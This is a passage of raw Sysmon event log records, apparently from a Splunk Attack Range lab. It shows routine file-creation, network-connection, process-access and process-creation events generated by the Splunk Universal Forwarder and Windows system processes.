Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B8B9A08F706F175B1A31446D52E987,SHA256=55350443B95B160E30F3A1FBE145CDB5D5EDCD1F3D700D32C8865B9EC5DBCE12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:41.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DF0D5F45315BFF8E60FC89103179447,SHA256=9007ECF105BC55F49E143FBBBC6E8ACA02D0BBC36C3EC9519B19EA1E9A94BE78,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:39.448{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51149-false10.0.1.12-8000- 354300x8000000000000000284784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:38.854{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53201-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 10341000x8000000000000000284783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:41.422{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:42.854{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7F85DB444C7A90AD01BB5C2ED680BAE,SHA256=9D58E7FA1D97DCAC3CE9ED34E5FEA1B98C050767DF417126542C36869E04FB72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213816Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:43.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBDFC821F35F5B8238ECF470CF361560,SHA256=6DB7839717B2F59C577C9A01CB5EDDE30916D5A149E2B67FAF2B6A5F4EC06B5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:43.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3F0373E7537EDA797D09F59DBC02775,SHA256=782C42767B85FBB375FD56938D61A72609898A148A8E7C7A72048ECC7ED44582,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:44.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01516A5425A25F2B222C3B7D0FC749C9,SHA256=D90083D9A32AC72D162AA38C07F56B23E0B84A29465C6A676F290E60466D029A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:45.032{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F00616092076C75C30AC23D66CCFD8,SHA256=3A70D5B1394B7328D7B244B983E6018BA9CFA4E7BC1624C84C0F79630858B84D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC5-6216-E803-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0DC5-6216-E803-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.823{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC5-6216-E803-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.824{4F8D34B0-0DC5-6216-E803-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.636{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC5-6216-E703-000000003902}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 